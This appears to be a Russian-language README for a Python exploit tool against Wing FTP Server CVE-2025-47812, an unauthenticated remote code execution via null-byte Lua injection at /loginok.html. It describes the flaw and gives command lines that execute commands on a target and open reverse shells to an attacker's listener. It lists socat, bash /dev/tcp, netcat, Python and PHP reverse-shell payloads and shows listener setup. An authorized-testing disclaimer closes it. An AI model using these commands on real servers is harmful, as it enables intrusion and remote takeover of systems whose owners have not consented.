
Эксплуатация неаутентифицированного удаленного выполнения кода для Wing FTP Server (CVE-2025-47812) с несколькими полезными нагрузками обратной оболочки, интерактивным и CLI режимами, а также автоматизированной обработкой сеансов.
| Поле | Значение |
|---|
| CVE | CVE-2025-47812 |
| Затрагиваемые | Wing FTP Server < 7.4.4 |
| Тип | Неавторизованное удаленное выполнение кода |
| Оценка CVSS | 10.0 (Критический) |
| Исправлено в | Wing FTP Server 7.4.4 |
Уязвимость существует в конечной точке входа /loginok.html. Сервер не очищает нулевые байты (%00) в поле username. Это позволяет атакующему внедрить произвольный код Lua в файлы сессий, которые позже обрабатываются на стороне сервера при обращении к таким конечным точкам, как /dir.html, без какой-либо аутентификации.
--payload-o--timeout и --delay-vCtrl+Cpip install requests
python3 wingftp_rce_exploit.py
# Выполнить команду
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Сохранить вывод в файл
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Обратный шелл (попробовать все полезные нагрузки)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Обратный шелл (конкретная полезная нагрузка)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url Базовый URL цели
-U / --username Имя пользователя для входа (по умолчанию: anonymous)
-c / --command Команда для выполнения (режим команды)
-r / --rhost Ваш IP слушателя (режим обратного шелла)
-p / --rport Ваш порт слушателя (режим обратного шелла)
--payload Конкретная полезная нагрузка (см. список ниже)
--timeout Тайм-аут HTTP-запроса в секундах (по умолчанию: 10)
--delay Задержка между попытками полезной нагрузки в секундах (по умолчанию: 4)
-o / --output Сохранить вывод команды в файл
-v / --verbose Включить отладочный вывод
| Имя | Метод |
|---|---|
socat | Полный PTY через socat |
bash | Перенаправление /dev/tcp |
python3 | Подпроцесс сокета |
nc-e | Netcat с флагом -e |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |
Целевой URL : http://192.168.1.10:5466
Имя пользователя : anonymous
Выбор : 1
Команда : whoami
Шаг 1 — Запустите ваш слушатель (рекомендуется socat для полного TTY):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
Или с помощью nc:
nc -lvnp 4444
Шаг 2 — Запустите эксплойт:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
Этот инструмент предназначен исключительно для образовательных целей и авторизованного тестирования безопасности.
НЕ используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.
Несанкционированное использование является незаконным. Авторы не несут ответственности за неправомерное использование.